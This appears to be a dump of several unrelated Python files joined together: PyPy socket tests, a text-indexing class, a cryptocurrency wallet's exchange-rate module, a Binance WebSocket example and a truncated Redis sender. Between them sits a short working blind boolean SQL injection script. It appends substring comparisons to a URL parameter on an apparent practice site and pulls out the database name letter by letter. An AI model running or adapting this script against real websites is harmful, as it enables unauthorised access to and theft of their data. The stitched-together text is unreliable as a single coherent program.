s2.bind(INETAddress('127.0.0.1', INADDR_ANY))
addr2 = s2.getsockname()
s1.sendto('?', 0, addr2)
buf = s2.recv(100)
assert buf == '?'
s2.connect(addr)
count = s2.send('x'*99)
assert 1 <= count <= 99
buf, addr3 = s1.recvfrom(100)
assert buf == 'x'*count
print addr2, addr3
assert addr2.get_port() == addr3.get_port()
s1.close()
s2.close()
def test_nonblocking():
sock = RSocket()
sock.setblocking(False)
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print 'binding to port %d:' % (port,),
try:
sock.bind(INETAddress('127.0.0.1', port))
print 'works'
break
except SocketError as e: # should get a "Permission denied"
print e
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(sock.getsockname())
sock.listen(1)
err = py.test.raises(CSocketError, sock.accept)
assert err.value.errno in (errno.EAGAIN, errno.EWOULDBLOCK)
s2 = RSocket(AF_INET, SOCK_STREAM)
s2.setblocking(False)
err = py.test.raises(CSocketError, s2.connect, addr)
assert err.value.errno in (errno.EINPROGRESS, errno.EWOULDBLOCK)
fd1, addr2 = sock.accept()
s1 = RSocket(fd=fd1)
s1.setblocking(False)
assert addr.eq(s2.getpeername())
assert addr2.get_port() == s2.getsockname().get_port()
assert addr2.eq(s1.getpeername())
err = s2.connect_ex(addr) # should now work
assert err in (0, errno.EISCONN)
s1.send('?')
import time
time.sleep(0.01) # Windows needs some time to transfer data
buf = s2.recv(100)
assert buf == '?'
err = py.test.raises(CSocketError, s1.recv, 5000)
assert err.value.errno in (errno.EAGAIN, errno.EWOULDBLOCK)
count = s2.send('x'*50000)
assert 1 <= count <= 50000
while count: # Recv may return less than requested
buf = s1.recv(count + 100)
assert len(buf) <= count
assert buf.count('x') == len(buf)
count -= len(buf)
# Check that everything has been read
err = py.test.raises(CSocketError, s1.recv, 5000)
s1.close()
s2.close()
def test_getaddrinfo_http():
lst = getaddrinfo('localhost', 'http')
assert isinstance(lst, list)
found = False
for family, socktype, protocol, canonname, addr in lst:
if (family == AF_INET and
socktype == SOCK_STREAM and
addr.get_host() == '127.0.0.1' and
addr.get_port() == 80):
found = True
assert found, lst
# The following might fail if the DNS redirects failed requests to a
# catch-all address (i.e. opendns).
e = py.test.raises(GAIError, getaddrinfo, 'www.very-invalidaddress.com', None)
assert isinstance(e.value.get_msg(), str)
def getaddrinfo_pydotorg(i, result):
lst = getaddrinfo('python.org', None)
assert isinstance(lst, list)
found = False
for family, socktype, protocol, canonname, addr in lst:
if addr.get_host() == '104.130.43.121':
found = True
result[i] += found
def test_getaddrinfo_pydotorg():
result = [0,]
getaddrinfo_pydotorg(0, result)
assert result[0] == 1
def test_getaddrinfo_no_reverse_lookup():
# It seems that getaddrinfo never runs a reverse lookup on Linux.
# Python2.3 on Windows returns the hostname.
lst = getaddrinfo('82.94.164.162', None, flags=AI_NUMERICHOST)
assert isinstance(lst, list)
found = False
print lst
for family, socktype, protocol, canonname, addr in lst:
assert 'python.org' not in canonname
if addr.get_host() == '82.94.164.162':
found = True
assert found, lst
def test_getaddrinfo_osx_crash():
# see CPython issue17269
for port in [None, '0', '00']:
getaddrinfo('localhost', port, 0, 0, 0, AI_NUMERICSERV)
def test_connect_ex():
s = RSocket()
err = s.connect_ex(INETAddress('0.0.0.0', 0)) # should not work
assert err in (errno.ECONNREFUSED, errno.EADDRNOTAVAIL)
s.close()
def test_connect_with_timeout_fail():
s = RSocket()
s.settimeout(0.1)
with py.test.raises(SocketTimeout):
s.connect(INETAddress('172.30.172.30', 12345))
s.close()
def test_connect_with_timeout_succeed():
s = RSocket()
s.settimeout(10.0)
s.connect(INETAddress('python.org', 80))
s.close()
def test_getsetsockopt():
import struct
assert struct.calcsize("i") == rffi.sizeof(rffi.INT)
# A socket sould start with reuse == 0
s = RSocket(AF_INET, SOCK_STREAM)
reuse = s.getsockopt_int(SOL_SOCKET, SO_REUSEADDR)
assert reuse == 0
s.setsockopt_int(SOL_SOCKET, SO_REUSEADDR, 1)
reuse = s.getsockopt_int(SOL_SOCKET, SO_REUSEADDR)
assert reuse != 0
# Test string case
s = RSocket(AF_INET, SOCK_STREAM)
reusestr = s.getsockopt(SOL_SOCKET, SO_REUSEADDR, rffi.sizeof(rffi.INT))
value, = struct.unpack("i", reusestr)
assert value == 0
optstr = struct.pack("i", 1)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, optstr)
reusestr = s.getsockopt(SOL_SOCKET, SO_REUSEADDR, rffi.sizeof(rffi.INT))
value, = struct.unpack("i", reusestr)
assert value != 0
def test_dup():
s = RSocket(AF_INET, SOCK_STREAM)
try:
s.bind(INETAddress('localhost', 50007))
if sys.platform == "win32":
assert not hasattr(s, 'dup')
return
s2 = s.dup()
try:
assert s.fd != s2.fd
assert s.getsockname().eq(s2.getsockname())
finally:
s2.close()
finally:
s.close()
def test_c_dup():
# rsocket.dup() duplicates fd, it also works on Windows
# (but only on socket handles!)
s = RSocket(AF_INET, SOCK_STREAM)
try:
s.bind(INETAddress('localhost', 50007))
s2 = RSocket(fd=dup(s.fd))
try:
assert s.fd != s2.fd
assert s.getsockname().eq(s2.getsockname())
finally:
s2.close()
finally:
s.close()
def test_inet_aton():
assert inet_aton('1.2.3.4') == '\x01\x02\x03\x04'
assert inet_aton('127.0.0.1') == '\x7f\x00\x00\x01'
tests = ["127.0.0.256", "127.0.0.255555555555555555", "127.2b.0.0",
"127.2.0.0.1", "127.2.0."]
for ip in tests:
py.test.raises(SocketError, inet_aton, ip)
# Windows 2000: missing numbers are replaced by 0
for ip, aton in [("11..22.33", '\x0b\x00\x16\x21'),
(".11.22.33", '\x00\x0b\x16\x21')]:
try:
assert inet_aton(ip) == aton
except SocketError:
pass
def test_inet_ntoa():
assert inet_ntoa('\x01\x02\x03\x04') == '1.2.3.4'
def test_inet_pton():
if not hasattr(rsocket, 'inet_pton'):
py.test.skip("no inet_pton()")
assert inet_pton(AF_INET, '1.2.3.5') == '\x01\x02\x03\x05'
py.test.raises(SocketError, inet_pton, AF_INET, '127.0.0.256')
def test_inet_ntop():
if not hasattr(rsocket, 'inet_ntop'):
py.test.skip("no inet_ntop()")
assert inet_ntop(AF_INET, '\x01\x02\x03\x05') == '1.2.3.5'
def test_unix_socket_connect():
if getattr(rsocket, 'AF_UNIX', None) is None:
py.test.skip('AF_UNIX not supported.')
from rpython.tool.udir import udir
sockpath = str(udir.join('test_unix_socket_connect'))
a = UNIXAddress(sockpath)
serversock = RSocket(AF_UNIX)
serversock.bind(a)
serversock.listen(1)
clientsock = RSocket(AF_UNIX)
clientsock.connect(a)
fd, addr = serversock.accept()
s = RSocket(AF_UNIX, fd=fd)
s.send('X')
data = clientsock.recv(100)
assert data == 'X'
clientsock.send('Y')
data = s.recv(100)
assert data == 'Y'
clientsock.close()
s.close()
class TestTCP:
PORT = 50007
HOST = 'localhost'
def setup_method(self, method):
self.serv = RSocket(AF_INET, SOCK_STREAM)
self.serv.bind(INETAddress(self.HOST, self.PORT))
self.serv.listen(1)
def teardown_method(self, method):
self.serv.close()
self.serv = None
def test_timeout(self):
def raise_timeout():
self.serv.settimeout(1.0)
self.serv.accept()
py.test.raises(SocketTimeout, raise_timeout)
def test_timeout_zero(self):
def raise_error():
self.serv.settimeout(0.0)
foo = self.serv.accept()
py.test.raises(SocketError, raise_error)
def _test_cond_include(cond):
# Test that _rsocket_rffi is importable even on platforms where
# AF_PACKET or AF_NETLINK is not defined.
import re
from rpython.rlib import _rsocket_rffi
srcfile = _rsocket_rffi.__file__
if srcfile.lower().endswith('c') or srcfile.lower().endswith('o'):
srcfile = srcfile[:-1] # .pyc => .py
assert srcfile.lower().endswith('.py')
sourcelines = open(srcfile, 'rb').read().splitlines()
found = False
for i, line in enumerate(sourcelines):
line2 = re.sub(r"(\s*COND_HEADER\s*=)",
r"\1'#undef %s\\n'+" % cond,
line)
if line2 != line:
found = True
sourcelines[i] = line2
assert found
d = {}
sourcelines.append('')
exec '\n'.join(sourcelines) in d
def test_no_AF_PACKET():
_test_cond_include('AF_PACKET')
def test_no_AF_NETLINK():
_test_cond_include('AF_NETLINK')
def test_thread_safe_gethostbyaddr():
py.test.skip("hits non-thread-safe issues with ll2ctypes")
import threading
nthreads = 10
ip = '8.8.8.8'
domain = gethostbyaddr(ip)[0]
result = [0] * nthreads
threads = [None] * nthreads
lock = threading.Lock()
def lookup_addr(ip, i):
name, aliases, address_list = gethostbyaddr(ip, lock)
if name == domain:
result[i] += 1
for i in range(nthreads):
threads[i] = threading.Thread(target = lookup_addr, args=[ip, i])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_thread_safe_gethostbyname_ex():
py.test.skip("hits non-thread-safe issues with ll2ctypes")
import threading
nthreads = 10
domain = 'google.com'
result = [0] * nthreads
threads = [None] * nthreads
lock = threading.Lock()
def lookup_name(i):
name, aliases, address_list = gethostbyname_ex(domain, lock)
if name == domain:
result[i] += 1
for i in range(nthreads):
threads[i] = threading.Thread(target = lookup_name, args=[i])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_getaddrinfo_pydotorg_threadsafe():
py.test.skip("hits non-thread-safe issues with ll2ctypes")
import threading
nthreads = 10
result = [0] * nthreads
threads = [None] * nthreads
for i in range(nthreads):
threads[i] = threading.Thread(target = getaddrinfo_pydotorg, args=[i, result])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_translate_netdb_lock():
def f():
rsocket_startup()
gethostbyaddr("localhost")
return 0
fc = compile(f, [])
assert fc() == 0
def test_translate_netdb_lock_thread():
def f():
rsocket_startup()
gethostbyaddr("localhost")
return 0
fc = compile(f, [], thread=True)
assert fc() == 0
|
__init__.py
|
import operator, math, queue, threading, pickle
from nltk.tokenize import RegexpTokenizer
from nltk.stem import PorterStemmer
from nltk.corpus import stopwords as stopwords_from_nltk
# stopwords from nltk
# {‘ourselves’, ‘hers’, ‘between’, ‘yourself’, ‘but’, ‘again’, ‘there’, ‘about’, ‘once’, ‘during’, ‘out’, ‘very’, ‘having’, ‘with’, ‘they’, ‘own’, ‘an’, ‘be’, ‘some’, ‘for’, ‘do’, ‘its’, ‘yours’, ‘such’, ‘into’, ‘of’, ‘most’, ‘itself’, ‘other’, ‘off’, ‘is’, ‘s’, ‘am’, ‘or’, ‘who’, ‘as’, ‘from’, ‘him’, ‘each’, ‘the’, ‘themselves’, ‘until’, ‘below’, ‘are’, ‘we’, ‘these’, ‘your’, ‘his’, ‘through’, ‘don’, ‘nor’, ‘me’, ‘were’, ‘her’, ‘more’, ‘himself’, ‘this’, ‘down’, ‘should’, ‘our’, ‘their’, ‘while’, ‘above’, ‘both’, ‘up’, ‘to’, ‘ours’, ‘had’, ‘she’, ‘all’, ‘no’, ‘when’, ‘at’, ‘any’, ‘before’, ‘them’, ‘same’, ‘and’, ‘been’, ‘have’, ‘in’, ‘will’, ‘on’, ‘does’, ‘yourselves’, ‘then’, ‘that’, ‘because’, ‘what’, ‘over’, ‘why’, ‘so’, ‘can’, ‘did’, ‘not’, ‘now’, ‘under’, ‘he’, ‘you’, ‘herself’, ‘has’, ‘just’, ‘where’, ‘too’, ‘only’, ‘myself’, ‘which’, ‘those’, ‘i’, ‘after’, ‘few’, ‘whom’, ‘t’, ‘being’, ‘if’, ‘theirs’, ‘my’, ‘against’, ‘a’, ‘by’, ‘doing’, ‘it’, ‘how’, ‘further’, ‘was’, ‘here’, ‘than’}
class Index:
tokenizer = RegexpTokenizer(r'\w+')
stop_words = stopwords_from_nltk.words()
stemmer = PorterStemmer()
def __init__(self):
self._thread_lock = threading.Lock()
self._doc_set = set()
self._index_dict = {}
self._index_queue = queue.Queue()
def print(self, content):
print(content)
@staticmethod # A static method doesn't receive any reference argument whether it is called by an instance of a class or by the class itself
def clean(content):
tokens = Index.tokenizer.tokenize(content)
tokens = [Index.stemmer.stem(i) for i in tokens if i not in Index.stop_words]
return tokens
def index(self, document_id, content):
tokens = Index.clean(content) # remove ? ! . , and stopwords
token_set = set(tokens)
for token in token_set:
token_count = tokens.count(token)
self._update_inverted_index(token, document_id, token_count)
self._doc_set.add(document_id)
return
def _update_inverted_index(self, token, document, count):
if token not in self._index_dict:
with self._thread_lock:
self._index_dict[token] = {
'count': count,
'frequency': {document: count}
}
else:
with self._thread_lock:
self._index_dict[token]['frequency'][document] = count
self._index_dict[token]['count'] += count
def get_documents_containing_word(self, token, count=None, text_=True):
token = Index.clean(token)
if len(token) == 0:
return []
token = token[0]
docs = self._index_dict.get(token, {'frequency': {}})['frequency']
#self.print(self._index_dict)
sorted_docs = sorted(docs.items(), key=operator.itemgetter(1), reverse=False)
doc_list = list(sorted_docs)
return_doc_list = []
for doc in doc_list:
return_doc_list.append(doc + (self._text_from_file(doc[0]), ))
if text_:
return return_doc_list if count is None else return_doc_list[:count]
else:
return doc_list if count is None else doc_list[:count]
def _text_from_file(self, path):
with open(path) as f:
return f.read()
def bulk_index(self, doc_list, threads):
for txt_item in doc_list:
self.print('%s was added to queue' % txt_item[0])
self._index_queue.put(txt_item)
thread_list = []
#self.print(threads)
for i in range(threads):
th = threading.Thread(target=self._index_worker)
th.start()
thread_list.append(th)
for th in thread_list:
th.join()
def _index_worker(self):
while True:
try:
doc_id, content = self._index_queue.get(timeout=0.1)
except:
return
self.index(doc_id, content)
self.print('%s docs left to process - %s was indexed' % (self._index_queue.qsize(), doc_id))
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0,
# Not ISO 4217.
'BTC': 8}
DEFAULT_EXCHANGE = 'CoinMarketCap'
DEFAULT_CCY = 'USD'
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum-bitcoinprivate'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum-bitcoinprivate'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com',
'/indices/local/ticker/BTCP%s' % ccy)
return {ccy: Decimal(json['last'])}
def history_ccys(self):
return ['USD', 'EUR', 'PLN']
def request_history(self, ccy):
history = self.get_json('apiv2.bitcoinaverage.com',
"/indices/local/history/BTCP%s"
"?period=alltime&format=json" % ccy)
return dict([(h['time'][:10], h['average']) for h in history])
class Bittrex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bittrex.com',
'/api/v1.1/public/getticker?market=BTC-BTCP')
quote_currencies = {}
if not json.get('success', False):
return quote_currencies
last = Decimal(json['result']['Last'])
quote_currencies['BTC'] = last
return quote_currencies
class Poloniex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('poloniex.com', '/public?command=returnTicker')
quote_currencies = {}
bitcoinprivate_ticker = json.get('BTC_BTCP')
quote_currencies['BTC'] = Decimal(bitcoinprivate_ticker['last'])
return quote_currencies
class CoinMarketCap(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinmarketcap.com', '/v1/ticker/1437/')
quote_currencies = {}
if not isinstance(json, list):
return quote_currencies
json = json[0]
for ccy, key in [
('USD', 'price_usd'),
]:
quote_currencies[ccy] = Decimal(json[key])
return quote_currencies
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", DEFAULT_CCY)
def config_exchange(self):
return self.config.get('use_exchange', DEFAULT_EXCHANGE)
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, Bittrex)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from electrum_bitcoinprivate.util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
BlindSQLiBooleanBased.py
|
import requests
from queue import Queue
from threading import Thread
import threading
from time import sleep
db =[]
def inject_simple(url:str,query:str,queue):
reference = 'Blad3'
for i in range(1, 10):
for j in range(ord('a'), ord('u') + 1):
montagem =f"{url} and substring( ( {query} ), {str(i)} ,1 )= {hex(ord(chr(j)))} -- -"
print(montagem)
r = requests.get(montagem)
queue.put(r)
while queue.qsize() > 0:
queue.get(r)
queue.task_done
html = r.text
if reference in html:
db.append(chr(j))
url = 'http://testphp.vulnweb.com/artists.php?artist=2'
payload = 'database()'
quantidade_de_thread = [ ]
threads = Thread(target=inject_simple, args=(url,payload, Queue()), daemon=True)
threads.start()
quantidade_de_thread.append(threads)
for inciar in quantidade_de_thread:
inciar.join()
name_dba = ''.join(db)
print(f"Banco de dados :===> {name_dba}")
|
example_userdata_stream.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_userdata_stream.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2020, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
print(oldest_stream_data_from_stream_buffer)
# configure api key and secret for binance.com
binance_com_api_key = ""
binance_com_api_secret = ""
# configure api key and secret for binance.je
binance_je_api_key = ""
binance_je_api_secret = ""
# configure api key and secret for binance.us
binance_us_api_key = ""
binance_us_api_secret = ""
# configure api key and secret for binance.us
binance_com_iso_api_key = ""
binance_com_iso_api_secret = ""
# create instances of BinanceWebSocketApiManager
binance_com_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com",
throw_exception_if_unrepairable=True)
binance_je_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.je")
binance_us_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.us")
binance_com_isolated_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com-isolated_margin")
# create the userData streams
binance_com_user_data_stream_id = binance_com_websocket_api_manager.create_stream('arr', '!userData',
api_key=binance_com_api_key,
api_secret=binance_com_api_secret)
binance_je_user_data_stream_id = binance_je_websocket_api_manager.create_stream('arr', '!userData',
api_key=binance_je_api_key,
api_secret=binance_je_api_secret)
binance_us_user_data_stream_id = binance_us_websocket_api_manager.create_stream('arr', '!userData',
api_key=binance_us_api_key,
api_secret=binance_us_api_secret)
binance_com_iso_user_data_stream_id = binance_com_isolated_websocket_api_manager.create_stream('arr', '!userData',
symbols="trxbtc",
api_key=binance_com_iso_api_key,
api_secret=binance_com_iso_api_secret)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_com_websocket_api_manager,))
worker_thread.start()
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_je_websocket_api_manager,))
worker_thread.start()
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_us_websocket_api_manager,))
worker_thread.start()
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer,
args=(binance_com_isolated_websocket_api_manager,))
worker_thread.start()
# monitor the streams
while True:
binance_com_isolated_websocket_api_manager.print_stream_info(binance_com_iso_user_data_stream_id)
binance_com_websocket_api_manager.print_summary()
binance_je_websocket_api_manager.print_summary()
binance_us_websocket_api_manager.print_summary()
binance_com_isolated_websocket_api_manager.print_summary()
time.sleep(5)
|
sender.py
|
import redis
import re
import time
import json
import logging
import random
from threading import Thread
from . import defaults
from . import common
from .pipeline import (
from_pipeline,
send_to_pipeline_execute,
)
from .utils import (
checked_order,
check_connect_worker
)
class Sender(common.Initer):
def __init__(self,
rds = redis.StrictRedis(),
):
self.rds = rds
self.rds.ping() # 确认链接 redis。
self.start_worker = []
@classmethod
def from_settings(cls,**kw):
rds = cls.redis_from_settings(**kw)
# 默认配置也可以在这里配置
global defaults
for i in kw:
if hasattr(defaults,i):
setattr(defaults,i,kw[i])
return cls(rds=rds)
def process_run(self):
workernum = len(self.start_worker)
if not workernum: return
if self.dumping:
self.dumping_stop = False
self.dumping_queues = {} # 实时数据保存时需要用的部分。
self.ntaskstop = 0
def _logger():
while self.keepalive:
runinfo = from_pipeline(self, self.taskid, 'run')
if runinfo and runinfo['piptype'] == 'realtime':
with self.lock:
if runinfo['dumps']:
if self.dumping:
datamsg = json.loads(runinfo['msg'])
table,data = datamsg['table'],json.dumps(datamsg['data'])
if table not in self.dumping_queues:
self.dumping_queues[table] = []
self.dumping_queues[table].append(data)
else:
print(runinfo['msg']) # 从显示的角度来看,这里只显示 realtime 的返回,数据放在管道里即可。
if self.taskstop and runinfo is None:
with self.lock:
self.ntaskstop += 1
if self.ntaskstop == defaults.VREDIS_SENDER_THREAD_SEND:
self.logstop = True
self.dumping_stop = True
break
def _dumper():
files = {}
while not self.taskstop:
for table in list(self.dumping_queues):
if table not in files:
files[table] = open('%04d%02d%02d-%02d%02d%02d-%s.json'%(time.localtime()[:6] + (table,)), 'w',
encoding='utf-8',
buffering=1024 )
